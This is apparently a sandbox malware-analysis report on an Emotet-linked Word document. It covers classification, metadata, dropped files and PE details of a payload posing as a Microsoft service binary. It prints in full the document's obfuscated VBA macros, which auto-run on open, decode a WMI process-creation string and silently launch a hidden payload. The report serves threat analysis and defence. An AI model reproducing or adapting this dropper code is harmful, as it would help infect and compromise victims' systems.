VTI SCORE: 100/100
Dynamic Analysis Report |
Classification: |
Dropper
Downloader
Spyware
|
Threat Names: |
Emotet
Generic.EmotetU.C1B1709D
Gen:Variant.Razy.494038
...
|
sample.doc
Word Document
Created at 2020-01-21T19:55:00
Remarks
(0x0200000C): The maximum memory dump size was exceeded. Some dumps may be missing in the report.
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
Filename | Category | Type | Severity | Actions |
---|
C:\Users\aETAdzjz\Desktop\sample.doc | Sample File | Word Document |
Malicious
|
...
|
»
Office Information
»
Title | Eaque. |
Creator | Romain Lambert |
Revision | 1 |
Create Time | 2020-01-21 17:53:00+00:00 |
Modify Time | 2020-01-21 17:53:00+00:00 |
Document Information
»
Codepage | ANSI_Latin1 |
Application | Microsoft Office Word |
App Version | 16.0 |
Template | Normal.dotm |
Document Security | NONE |
Page Count | 1 |
Line Count | 1 |
Paragraph Count | 1 |
Word Count | 4 |
Character Count | 28 |
Chars With Spaces | 31 |
scale_crop | False |
shared_doc | False |
Controls (2)
»
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020906-0000-0000-C000-000000000046} | Word97 | - |
{6E182020-F460-11CE-9BCD-00AA00608E01} | FormsFrame | - |
VBA Macros (2)
»
Macro #1: Halpaohsi
»
Attribute VB_Name = "Halpaohsi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Phffmgfhyakn
End Sub
Macro #2: Tslcncqezxxw
»
Attribute VB_Name = "Tslcncqezxxw"
Function Cxwtfasbi()
For Ummppcjymvmfw = rgfasd To Mbeqdzhakotiy
ewr = dsf - CVar(er * 23)
Ozuiphpxdsni = CSng(Qrwnlqfsd)
Nmbbvukqshnko = CLng(Wdbxpruutww)
Next
If er > Rowwwmbvov Then
gggs = Sin(3)
Crtydgixxtbqg = Srhezzyzd
Obosihuynzb = CByte(8 - CSng(3))
End If
If sdf > Qoxoxmfqohi Then
wer3 = Sin(1)
Rizesqnmr = Fluwhufrur
Bjbqfaaufo = CByte(234 - CSng(3))
End If
For Lzjhkjdzioj = rgfasd To Jitbrjpcxxuq
ewr = dsf - CDbl(er * 23)
Mrldqjdkh = CSng(Glnpbnapywrgt)
Mnoboqlbr = CLng(Ksdpybickxbnw)
Next
Psyxizhgdtcsr = I + ChrW(wdKeyP)
For Haeiuvmwpueta = rgfasd To Arbtkeldv
ewr = dsf - CVar(er * 23)
Hiccshwszmljt = CSng(Fujgvdcvsutfz)
Xjywoetnbxxhl = CLng(Ihllyquooue)
Next
If er > Izbxxepbkx Then
gggs = Sin(3)
Lhhiywradmlu = Fcukckrjebwzk
Nxjrqnimf = CByte(8 - CSng(3))
End If
If sdf > Mmhwnhjbymhav Then
wer3 = Sin(1)
Cdfmzmku = Cdwiwqouexe
Ooqiitfwo = CByte(234 - CSng(3))
End If
For Kfgsqlcrrhl = rgfasd To Scwsgrmzau
ewr = dsf - CDbl(er * 23)
Idbbksnwjyqjw = CSng(Unkbckdpgwnq)
Njlouhiaphoy = CLng(Ulnwcysm)
Next
Xgnhnban = Psyxizhgdtcsr + Xvzwvdjxjbaph.Dmhwktuoqw + Xvzwvdjxjbaph.Mspgvegbrck
For Rvikdnfkowx = rgfasd To Pexrfnlrx
ewr = dsf - CVar(er * 23)
Zkbugpnmcl = CSng(Fgwgodgxxm)
Oceredxtuxksl = CLng(Yjkztktr)
Next
If er > Gwoqdombd Then
gggs = Sin(3)
Lvhzokpi = Vdzinmnqm
Tjyhjdriyr = CByte(8 - CSng(3))
End If
If sdf > Znocaeaej Then
wer3 = Sin(1)
Lsoiqbzl = Trmjrfhyzx
Zauzknlmqbe = CByte(234 - CSng(3))
End If
For Ouubhzfqsg = rgfasd To Siztfjrq
ewr = dsf - CDbl(er * 23)
Onqrmzevrnhx = CSng(Mxsyhxgtzy)
Mtksnonv = CLng(Kpnflxoit)
Next
sss = Xvzwvdjxjbaph.Srghtmcdobug.GroupName
Hsiszpxdwvzre = Split(Xgnhnban + CStr(Trim(sss)), "=mmuusns=")
For Nfkmwqidjzol = rgfasd To Myxgwvdlvca
ewr = dsf - CVar(er * 23)
Cmpcqnaabwc = CSng(Okukbnajspyqw)
Ckimrzgruwx = CLng(Olcvaxgtq)
Next
If er > Meijwqlu Then
gggs = Sin(3)
Xroqozisan = Tuhndpzlxly
Nqwudkccxqtne = CByte(8 - CSng(3))
End If
If sdf > Xaqxvylncjnwu Then
wer3 = Sin(1)
Msgrajmywc = Veozzccnwv
Bcdulqoisl = CByte(234 - CSng(3))
End If
For Hmmolctu = rgfasd To Pjnjnuswoq
ewr = dsf - CDbl(er * 23)
Qyfsngotujzn = CSng(Qnbubgtpmu)
Ctpvwnjn = CLng(Itpngzrfjar)
Next
Cxwtfasbi = Join(Hsiszpxdwvzre, "")
For Hacdoyen = rgfasd To Wpojmowng
ewr = dsf - CVar(er * 23)
Vbahfauijsvq = CSng(Mlxwizrpyfmr)
Vrrldgmybw = CLng(Kfcpazorzcyqx)
Next
If er > Gcvuopin Then
gggs = Sin(3)
Kmsfnkbn = Mmjenctmttb
Cgwgbuicsk = CByte(8 - CSng(3))
End If
If sdf > Mvllswcmdqt Then
wer3 = Sin(1)
Hlvvtyzwbqz = Ztcmucuo
Haaxybhmm = CByte(234 - CSng(3))
End If
For Uimgymptkfm = rgfasd To Wijrwrzcgeo
ewr = dsf - CDbl(er * 23)
Bavudnppflpg = CSng(Evpbvgmaqsp)
Cmodykflpyqb = CLng(Yrxukzavh)
Next
End Function
Function Phffmgfhyakn()
dv = "in=mmuusns==mmuusns==mmuusns=mgm=mmuusns==mmuusns==mmuusns=t" + ChrW(wdKeyS) + ":=mmuusns==mmuusns=win=mmuusns==mmuusns=32=mmuusns==mmuusns=_" + Xvzwvdjxjbaph.Rghedtey + "r=mmuusns==mmuusns=oc=mmuusns==mmuusns==mmuusns=ess=mmuusns==mmuusns="
For Irhevqhybvg = rgfasd To Hhsopmqko
ewr = dsf - CVar(er * 23)
Gqorawher = CSng(Akmkjqycb)
Ftjcvmavdu = CLng(Xebpxfoc)
Next
If er > Bhhbfdzmlwuvk Then
gggs = Sin(3)
Ybudwflhk = Hbaxnkhhr
Ugxvriwfbtgh = CByte(8 - CSng(3))
End If
If sdf > Tyisqaxl Then
wer3 = Sin(1)
Ylojknddfchng = Dkenlatatum
Bbxigbxfunv = CByte(234 - CSng(3))
End If
For Dbwwfrhenpt = rgfasd To Uelupxopcdf
ewr = dsf - CDbl(er * 23)
Fdiixjzvx = CSng(Xourjome)
Gsuayxaabxry = CLng(Eweskxtxmh)
Next
fd = "=mmuusns="
For Ioqelyua = rgfasd To Iltypfpqhc
ewr = dsf - CVar(er * 23)
Czlgcqoovlkq = CSng(Maqsbzzgnbm)
Zzkomcpm = CLng(Ewemunwacryt)
Next
If er > Oaxtvmkuhmppk Then
gggs = Sin(3)
Nrdvhlwxnetra = Ffkkzlfw
Ikpsweczc = CByte(8 - CSng(3))
End If
If sdf > Uxhosdkpcvkkd Then
wer3 = Sin(1)
Fzxniunrya = Qzrryvdkh
Hhvhojyallnzc = CByte(234 - CSng(3))
End If
For Gfhginlxtpl = rgfasd To Pawccdpfnn
ewr = dsf - CDbl(er * 23)
Zauudzoqj = CSng(Cbujwjbrdgnll)
Wzlisriyim = CLng(Qpwmbabu)
Next
Jmtxjlisob = Split("=mmuusns==mmuusns==mmuusns==mmuusns==mmuusns=w" + dv + T, fd)
For Fqyzinoym = rgfasd To Pultigwfb
ewr = dsf - CVar(er * 23)
Uvilpzyvlnj = CSng(Eynhnfqvqvjr)
Afskklpwdqwx = CLng(Qztgcspk)
Next
If er > Svfuezzutfy Then
gggs = Sin(3)
Dygdivwkpqqf = Cpdeqnes
Vsdrcejca = CByte(8 - CSng(3))
End If
If sdf > Hvogovdcfoo Then
wer3 = Sin(1)
Wfpbicnlkaiqr = Kgoeilvtpx
Apjqgegvwpiu = CByte(234 - CSng(3))
End If
For Fxugqwpusyak = rgfasd To Bladgknwak
ewr = dsf - CDbl(er * 23)
Lklvytgpgy = CSng(Hecfwlqwa)
Lpfnogiwkfel = CLng(Wagepfcmrv)
Next
Mbxypfjaagzo = Join(Jmtxjlisob, "")
For Fgpbircvm = rgfasd To Fmsrpghx
ewr = dsf - CVar(er * 23)
Vuhylhkc = CSng(Zbhvwkzbssq)
Qtqshshb = CLng(Eklhdwjs)
Next
If er > Tddfxufhgfm Then
gggs = Sin(3)
Qrfvpckqotyck = Weiaxikm
Umnavartnu = CByte(8 - CSng(3))
End If
If sdf > Atpizekfcmjck Then
wer3 = Sin(1)
Lnogfpkvqwqtt = Xqmydplpjf
Iidlptdfgz = CByte(234 - CSng(3))
End If
For Jqyzmjlqyt = rgfasd To Pmxhzxebdebm
ewr = dsf - CDbl(er * 23)
Azpacydcpn = CSng(Datllptkvc)
Fjulgeolmbila = CLng(Qpmxkqnteis)
Next
Set Nbjlfulfh = GetObject(Mbxypfjaagzo)
For Dlaqwtsa = rgfasd To Xedfhncc
ewr = dsf - CVar(er * 23)
Nszuzkhonwyb = CSng(Esmykmztsyfik)
Jlmjomkmgrm = CLng(Mzgwzdbp)
Next
If er > Susuaaoq Then
gggs = Sin(3)
Ydklspmt = Hxbwgssjj
Aihuowsk = CByte(8 - CSng(3))
End If
If sdf > Bmhejovdjrhj Then
wer3 = Sin(1)
Utwoiiehucyvd = Tujvnglt
Dxgzpurnlzvzd = CByte(234 - CSng(3))
End If
For Otsfgnle = rgfasd To Wxohpjzfrel
ewr = dsf - CDbl(er * 23)
Ehgirqiuq = CSng(Zmtokjrsgjsw)
Vqwtmxrpl = CLng(Afunrvgqvicpk)
Next
Epuodgcp = Xvzwvdjxjbaph.Qgnmwpcsosft.Tag
Nwlspbgev = Mbxypfjaagzo + ChrW(wdKeyS) + Xvzwvdjxjbaph.Hmqtdcvzqfs.Tag + Epuodgcp
For Jznxrrsnztkw = rgfasd To Icwwpescgsond
ewr = dsf - CVar(er * 23)
Erxqtqfhjlgio = CSng(Rongvkdbb)
Hsvjeocpvcmgh = CLng(Unliveda)
Next
If er > Zxtnbpwktjmmz Then
gggs = Sin(3)
Fyddfifxsppq = Vdrvjeqicu
Voyqineppgz = CByte(8 - CSng(3))
End If
If sdf > Rtabxlzczygu Then
wer3 = Sin(1)
Ccxvjromryb = Mdupeuar
Geinnwqsvrw = CByte(234 - CSng(3))
End If
For Skqfgfcbaqk = rgfasd To Fibaqzrlqqada
ewr = dsf - CDbl(er * 23)
Ffpekqbe = CSng(Tlhogoyaorh)
Bxjbctpbgpbw = CLng(Fciddnlx)
Next
Fhmdqkvcai = Nwlspbgev + Xvzwvdjxjbaph.Rghedtey
For Lazvwlklomuqv = rgfasd To Bfspfsvlezbl
ewr = dsf - CVar(er * 23)
Djsngryqnjtae = CSng(Oiegnsfwcze)
Uwuaonkcccp = CLng(Lsjvfoyypqxe)
Next
If er > Ynpocckwr Then
gggs = Sin(3)
Mrmkmfpwshnm = Pqqefxvfhmpm
Ilpbuctxmnc = CByte(8 - CSng(3))
End If
If sdf > Hqxkajuml Then
wer3 = Sin(1)
Lrxgjauarbo = Msdasecbtpnp
Pcubwrxp = CByte(234 - CSng(3))
End If
For Moltcugti = rgfasd To Ifttgrprbkqyy
ewr = dsf - CDbl(er * 23)
Xarpuxozndsjz = CSng(Ugfdhwahqz)
Buwpnoewfbtka = CLng(Gqniqrspk)
Next
Set Phffmgfhyakn = GetObject(Fhmdqkvcai)
For Pudwquipw = rgfasd To Twkbeeebb
ewr = dsf - CVar(er * 23)
Ujelxdldnb = CSng(Mdvwekrpwmxwg)
Gqygnvgaure = CLng(Dsnfyyxxi)
Next
If er > Rjumimhfpmemp Then
gggs = Sin(3)
Dfdbfannl = Ryhjtxiypdaus
Ygrzfxjqvr = CByte(8 - CSng(3))
End If
If sdf > Czdwihiuj Then
wer3 = Sin(1)
Theqgdcll = Bgvmybihmszq
Lhsmjmabayrbh = CByte(234 - CSng(3))
End If
For Sgiohxwawj = rgfasd To Bkntqyquwk
ewr = dsf - CDbl(er * 23)
Guagwuxt = CSng(Umrcycpgwdca)
Mfbdrjqhhfh = CLng(Qdblnhgqbcozo)
Next
Phffmgfhyakn. _
showwindow = False
For Egpwnmsp = rgfasd To Nziwmlcoxazlv
ewr = dsf - CVar(er * 23)
Dlzspewhcf = CSng(Nucpbesqtki)
Qnsmbtkrlk = CLng(Xftrsgrexptv)
Next
If er > Hchrsdrjzrdva Then
gggs = Sin(3)
Xbkcwdyzzaerd = Txacliku
Angcnxffhzojt = CByte(8 - CSng(3))
End If
If sdf > Jdhqnloxyxfu Then
wer3 = Sin(1)
Pmgsewqrwmdzl = Mjemhcecdd
Qiehdggsmh = CByte(234 - CSng(3))
End If
For Rergvnoatkm = rgfasd To Hrwkkdpt
ewr = dsf - CDbl(er * 23)
Jreasfdzetqvc = CSng(Hqplsfvqgvpji)
Bvhehprnv = CLng(Livkmolmdma)
Next
Do While Nbjlfulfh. _
Create(er & Cxwtfasbi, Ttfwoikclybkw, Phffmgfhyakn, Anrwyrkpnf)
Loop
For Prlhuwaksj = rgfasd To Rzvqamgzdxk
ewr = dsf - CVar(er * 23)
Eyhuwmtjqih = CSng(Vlydskeg)
Lodfalishvsq = CLng(Pvxzearoearu)
Next
If er > Fzmjugwf Then
gggs = Sin(3)
Sxiqzqifo = Wmfbjbwkdog
Nhiivrvkc = CByte(8 - CSng(3))
End If
If sdf > Gsbonslgu Then
wer3 = Sin(1)
Nhhlezvpr = Zcsizjxkcuv
Qaiwkczpvfub = CByte(234 - CSng(3))
End If
For Mvomzustyw = rgfasd To Bjjjnsimuerz
ewr = dsf - CDbl(er * 23)
Myexxgyzkpo = CSng(Ecxcmqraqflr)
Ppiephkhuoby = CLng(Cyuvewejxcfi)
Next
End Function
Document Content
»
c:\users\aetadzjz\appdata\local\temp\~dfc9208b8177d1ee10.tmp | Dropped File | Unknown |
Whitelisted
|
...
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2013-03-17 16:11 (UTC+1) |
Last Seen | 2019-02-22 02:24 (UTC+1) |
c:\users\aetadzjz\appdata\local\temp\~df7fae8046229cf905.tmp | Dropped File | Stream |
Whitelisted
|
...
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2011-07-06 01:20 (UTC+2) |
Last Seen | 2019-12-06 01:08 (UTC+1) |
C:\Users\aETAdzjz\AppData\Local\sendduck\sendduckb.exe | Dropped File | Binary |
Whitelisted
|
...
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2012-10-01 02:48 (UTC+2) |
Last Seen | 2019-12-02 13:40 (UTC+1) |
PE Information
»
Image Base | 0x100000000 |
Entry Point | 0x10000bdfc |
Size Of Code | 0xf800 |
Size Of Initialized Data | 0x4400 |
File Type | FileType.executable |
Subsystem | Subsystem.windows_gui |
Machine Type | MachineType.amd64 |
Compile Timestamp | 2009-07-14 00:08:46+00:00 |
Version Information (8)
»
CompanyName | Microsoft Corporation |
FileDescription | Application Layer Gateway Service |
FileVersion | 6.1.7600.16385 (win7_rtm.090713-1255) |
InternalName | ALG.exe |
LegalCopyright | © Microsoft Corporation. All rights reserved. |
OriginalFilename | ALG.exe |
ProductName | Microsoft® Windows® Operating System |
ProductVersion | 6.1.7600.16385 |
Sections (5)
»
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x100001000 | 0xf7fe | 0xf800 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 5.98 |
.data | 0x100011000 | 0xe18 | 0x600 | 0xfc00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 2.36 |
.pdata | 0x100012000 | 0xfa8 | 0x1000 | 0x10200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.58 |
.rsrc | 0x100013000 | 0x1fc8 | 0x2000 | 0x11200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.5 |
.reloc | 0x100015000 | 0x28a | 0x400 | 0x13200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 2.9 |
Imports (9)
»
ADVAPI32.dll (9)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SetServiceStatus | 0x0 | 0x100001000 | 0xfcf8 | 0xf0f8 | 0x2c0 |
RegisterServiceCtrlHandlerW | 0x0 | 0x100001008 | 0xfd00 | 0xf100 | 0x288 |
RegNotifyChangeKeyValue | 0x0 | 0x100001010 | 0xfd08 | 0xf108 | 0x25d |
RegCloseKey | 0x0 | 0x100001018 | 0xfd10 | 0xf110 | 0x230 |
RegOpenKeyExW | 0x0 | 0x100001020 | 0xfd18 | 0xf118 | 0x261 |
StartServiceCtrlDispatcherW | 0x0 | 0x100001028 | 0xfd20 | 0xf120 | 0x2c8 |
RegQueryValueExW | 0x0 | 0x100001030 | 0xfd28 | 0xf128 | 0x26e |
RegEnumKeyExW | 0x0 | 0x100001038 | 0xfd30 | 0xf130 | 0x24f |
SystemFunction036 | 0x0 | 0x100001040 | 0xfd38 | 0xf138 | 0x2f1 |
KERNEL32.dll (36)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CreateEventW | 0x0 | 0x100001088 | 0xfd80 | 0xf180 | 0x85 |
WaitForMultipleObjects | 0x0 | 0x100001090 | 0xfd88 | 0xf188 | 0x506 |
Sleep | 0x0 | 0x100001098 | 0xfd90 | 0xf190 | 0x4c0 |
HeapSetInformation | 0x0 | 0x1000010a0 | 0xfd98 | 0xf198 | 0x2db |
WaitForSingleObject | 0x0 | 0x1000010a8 | 0xfda0 | 0xf1a0 | 0x508 |
SetEvent | 0x0 | 0x1000010b0 | 0xfda8 | 0xf1a8 | 0x467 |
CreateThread | 0x0 | 0x1000010b8 | 0xfdb0 | 0xf1b0 | 0xb4 |
CreateTimerQueueTimer | 0x0 | 0x1000010c0 | 0xfdb8 | 0xf1b8 | 0xbc |
DeleteTimerQueueTimer | 0x0 | 0x1000010c8 | 0xfdc0 | 0xf1c0 | 0xdb |
GetCurrentProcessId | 0x0 | 0x1000010d0 | 0xfdc8 | 0xf1c8 | 0x1c7 |
DuplicateHandle | 0x0 | 0x1000010d8 | 0xfdd0 | 0xf1d0 | 0xec |
GetCurrentProcess | 0x0 | 0x1000010e0 | 0xfdd8 | 0xf1d8 | 0x1c6 |
RaiseException | 0x0 | 0x1000010e8 | 0xfde0 | 0xf1e0 | 0x3b4 |
EnterCriticalSection | 0x0 | 0x1000010f0 | 0xfde8 | 0xf1e8 | 0xf2 |
LeaveCriticalSection | 0x0 | 0x1000010f8 | 0xfdf0 | 0xf1f0 | 0x33b |
WriteFile | 0x0 | 0x100001100 | 0xfdf8 | 0xf1f8 | 0x534 |
ReadFile | 0x0 | 0x100001108 | 0xfe00 | 0xf200 | 0x3c3 |
BindIoCompletionCallback | 0x0 | 0x100001110 | 0xfe08 | 0xf208 | 0x39 |
CloseHandle | 0x0 | 0x100001118 | 0xfe10 | 0xf210 | 0x52 |
GetProcessHeap | 0x0 | 0x100001120 | 0xfe18 | 0xf218 | 0x251 |
HeapAlloc | 0x0 | 0x100001128 | 0xfe20 | 0xf220 | 0x2d3 |
UnhandledExceptionFilter | 0x0 | 0x100001130 | 0xfe28 | 0xf228 | 0x4e2 |
TerminateProcess | 0x0 | 0x100001138 | 0xfe30 | 0xf230 | 0x4ce |
GetSystemTimeAsFileTime | 0x0 | 0x100001140 | 0xfe38 | 0xf238 | 0x280 |
GetCurrentThreadId | 0x0 | 0x100001148 | 0xfe40 | 0xf240 | 0x1cb |
GetTickCount | 0x0 | 0x100001150 | 0xfe48 | 0xf248 | 0x29a |
QueryPerformanceCounter | 0x0 | 0x100001158 | 0xfe50 | 0xf250 | 0x3a9 |
GetModuleHandleW | 0x0 | 0x100001160 | 0xfe58 | 0xf258 | 0x21e |
SetUnhandledExceptionFilter | 0x0 | 0x100001168 | 0xfe60 | 0xf260 | 0x4b3 |
GetStartupInfoW | 0x0 | 0x100001170 | 0xfe68 | 0xf268 | 0x26a |
InitializeCriticalSection | 0x0 | 0x100001178 | 0xfe70 | 0xf270 | 0x2ea |
DeleteCriticalSection | 0x0 | 0x100001180 | 0xfe78 | 0xf278 | 0xd2 |
DeleteTimerQueueEx | 0x0 | 0x100001188 | 0xfe80 | 0xf280 | 0xda |
CreateTimerQueue | 0x0 | 0x100001190 | 0xfe88 | 0xf288 | 0xbb |
GetLastError | 0x0 | 0x100001198 | 0xfe90 | 0xf290 | 0x208 |
HeapFree | 0x0 | 0x1000011a0 | 0xfe98 | 0xf298 | 0x2d7 |
msvcrt.dll (38)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
_unlock | 0x0 | 0x100001260 | 0xff58 | 0xf358 | 0x330 |
_lock | 0x0 | 0x100001268 | 0xff60 | 0xf360 | 0x1d5 |
?terminate@@YAXXZ | 0x0 | 0x100001270 | 0xff68 | 0xf368 | 0x30 |
memset | 0x0 | 0x100001278 | 0xff70 | 0xf370 | 0x484 |
_onexit | 0x0 | 0x100001280 | 0xff78 | 0xf378 | 0x27f |
??1type_info@@UEAA@XZ | 0x0 | 0x100001288 | 0xff80 | 0xf380 | 0x12 |
__dllonexit | 0x0 | 0x100001290 | 0xff88 | 0xf388 | 0x6d |
__set_app_type | 0x0 | 0x100001298 | 0xff90 | 0xf390 | 0x80 |
_fmode | 0x0 | 0x1000012a0 | 0xff98 | 0xf398 | 0x118 |
__setusermatherr | 0x0 | 0x1000012a8 | 0xffa0 | 0xf3a0 | 0x82 |
_amsg_exit | 0x0 | 0x1000012b0 | 0xffa8 | 0xf3a8 | 0xa0 |
_initterm | 0x0 | 0x1000012b8 | 0xffb0 | 0xf3b0 | 0x16c |
_wcmdln | 0x0 | 0x1000012c0 | 0xffb8 | 0xf3b8 | 0x371 |
exit | 0x0 | 0x1000012c8 | 0xffc0 | 0xf3c0 | 0x420 |
_cexit | 0x0 | 0x1000012d0 | 0xffc8 | 0xf3c8 | 0xb3 |
_exit | 0x0 | 0x1000012d8 | 0xffd0 | 0xf3d0 | 0xff |
_XcptFilter | 0x0 | 0x1000012e0 | 0xffd8 | 0xf3d8 | 0x52 |
__C_specific_handler | 0x0 | 0x1000012e8 | 0xffe0 | 0xf3e0 | 0x53 |
__wgetmainargs | 0x0 | 0x1000012f0 | 0xffe8 | 0xf3e8 | 0x8f |
__CxxFrameHandler3 | 0x0 | 0x1000012f8 | 0xfff0 | 0xf3f0 | 0x57 |
_callnewh | 0x0 | 0x100001300 | 0xfff8 | 0xf3f8 | 0xb1 |
malloc | 0x0 | 0x100001308 | 0x10000 | 0xf400 | 0x474 |
_CxxThrowException | 0x0 | 0x100001310 | 0x10008 | 0xf408 | 0x4c |
??0exception@@QEAA@AEBQEBDH@Z | 0x0 | 0x100001318 | 0x10010 | 0xf410 | 0xb |
memmove | 0x0 | 0x100001320 | 0x10018 | 0xf418 | 0x482 |
realloc | 0x0 | 0x100001328 | 0x10020 | 0xf420 | 0x497 |
??0exception@@QEAA@XZ | 0x0 | 0x100001330 | 0x10028 | 0xf428 | 0xd |
memmove_s | 0x0 | 0x100001338 | 0x10030 | 0xf430 | 0x483 |
memcpy_s | 0x0 | 0x100001340 | 0x10038 | 0xf438 | 0x481 |
_wcsicmp | 0x0 | 0x100001348 | 0x10040 | 0xf440 | 0x379 |
free | 0x0 | 0x100001350 | 0x10048 | 0xf448 | 0x43a |
?what@exception@@UEBAPEBDXZ | 0x0 | 0x100001358 | 0x10050 | 0xf450 | 0x32 |
??0exception@@QEAA@AEBV0@@Z | 0x0 | 0x100001360 | 0x10058 | 0xf458 | 0xc |
isdigit | 0x0 | 0x100001368 | 0x10060 | 0xf460 | 0x454 |
??1exception@@UEAA@XZ | 0x0 | 0x100001370 | 0x10068 | 0xf468 | 0x11 |
??0exception@@QEAA@AEBQEBD@Z | 0x0 | 0x100001378 | 0x10070 | 0xf470 | 0xa |
_commode | 0x0 | 0x100001380 | 0x10078 | 0xf478 | 0xc4 |
memcpy | 0x0 | 0x100001388 | 0x10080 | 0xf480 | 0x480 |
ATL.DLL (6)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
(by ordinal) | 0x11 | 0x100001050 | 0xfd48 | 0xf148 | - |
(by ordinal) | 0x10 | 0x100001058 | 0xfd50 | 0xf150 | - |
(by ordinal) | 0x20 | 0x100001060 | 0xfd58 | 0xf158 | - |
(by ordinal) | 0x17 | 0x100001068 | 0xfd60 | 0xf160 | - |
(by ordinal) | 0x14 | 0x100001070 | 0xfd68 | 0xf168 | - |
(by ordinal) | 0x15 | 0x100001078 | 0xfd70 | 0xf170 | - |
WS2_32.dll (15)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
htons | 0x9 | 0x1000011c8 | 0xfec0 | 0xf2c0 | - |
getpeername | 0x5 | 0x1000011d0 | 0xfec8 | 0xf2c8 | - |
getsockname | 0x6 | 0x1000011d8 | 0xfed0 | 0xf2d0 | - |
bind | 0x2 | 0x1000011e0 | 0xfed8 | 0xf2d8 | - |
WSASocketW | 0x0 | 0x1000011e8 | 0xfee0 | 0xf2e0 | 0x53 |
socket | 0x17 | 0x1000011f0 | 0xfee8 | 0xf2e8 | - |
closesocket | 0x3 | 0x1000011f8 | 0xfef0 | 0xf2f0 | - |
ntohs | 0xf | 0x100001200 | 0xfef8 | 0xf2f8 | - |
WSAIoctl | 0x0 | 0x100001208 | 0xff00 | 0xf300 | 0x36 |
listen | 0xd | 0x100001210 | 0xff08 | 0xf308 | - |
htonl | 0x8 | 0x100001218 | 0xff10 | 0xf310 | - |
setsockopt | 0x15 | 0x100001220 | 0xff18 | 0xf318 | - |
WSAStartup | 0x73 | 0x100001228 | 0xff20 | 0xf320 | - |
WSACleanup | 0x74 | 0x100001230 | 0xff28 | 0xf328 | - |
WSAGetLastError | 0x6f | 0x100001238 | 0xff30 | 0xf330 | - |
ole32.dll (6)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CoTaskMemFree | 0x0 | 0x1000013b8 | 0x100b0 | 0xf4b0 | 0x6c |
CoTaskMemAlloc | 0x0 | 0x1000013c0 | 0x100b8 | 0xf4b8 | 0x6b |
CoUninitialize | 0x0 | 0x1000013c8 | 0x100c0 | 0xf4c0 | 0x70 |
CoInitializeEx | 0x0 | 0x1000013d0 | 0x100c8 | 0xf4c8 | 0x43 |
CLSIDFromString | 0x0 | 0x1000013d8 | 0x100d0 | 0xf4d0 | 0xc |
CoCreateInstance | 0x0 | 0x1000013e0 | 0x100d8 | 0xf4d8 | 0x14 |
OLEAUT32.dll (2)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SysAllocString | 0x2 | 0x1000011b0 | 0xfea8 | 0xf2a8 | - |
SysFreeString | 0x6 | 0x1000011b8 | 0xfeb0 | 0xf2b0 | - |
ntdll.dll (3)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
RtlCaptureContext | 0x0 | 0x100001398 | 0x10090 | 0xf490 | 0x27b |
RtlLookupFunctionEntry | 0x0 | 0x1000013a0 | 0x10098 | 0xf498 | 0x401 |
RtlVirtualUnwind | 0x0 | 0x1000013a8 | 0x100a0 | 0xf4a0 | 0x4f0 |
WSOCK32.dll (2)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
ord1141 | 0x475 | 0x100001248 | 0xff40 | 0xf340 | - |
ord1142 | 0x476 | 0x100001250 | 0xff48 | 0xf348 | - |
Memory Dumps (9)
»
Name | Process ID | Start VA | End VA | Dump Reason | PE Rebuild | Bitness | Entry Point | AV | YARA | Actions |
---|---|---|---|---|---|---|---|---|---|---|
buffer | 22 | 0x140000000 | 0x140022FFF | First Execution | 64-bit | 0x140006B54 |
...
|
|||
sendduckb.exe | 22 | 0xFF7E0000 | 0xFF7F5FFF | Relevant Image | 64-bit | - |
...
|
|||
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x140007784 |
...
|
|||
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x14000A9F8 |
...
|
|||
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x14000B9B4 |
...
|
|||
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x14000C5E0 |
...
|
|||
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x14000D88C |
...
|
|||
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x1400046C0 |
...
|
|||
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x140005600 |
...
|
c:\users\aetadzjz\appdata\local\temp\~df5c3c42457c3f014b.tmp | Dropped File | Unknown |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\local\temp\~df207c8c2a9159a39e.tmp | Dropped File | Unknown |
Unknown
|
...
|
»
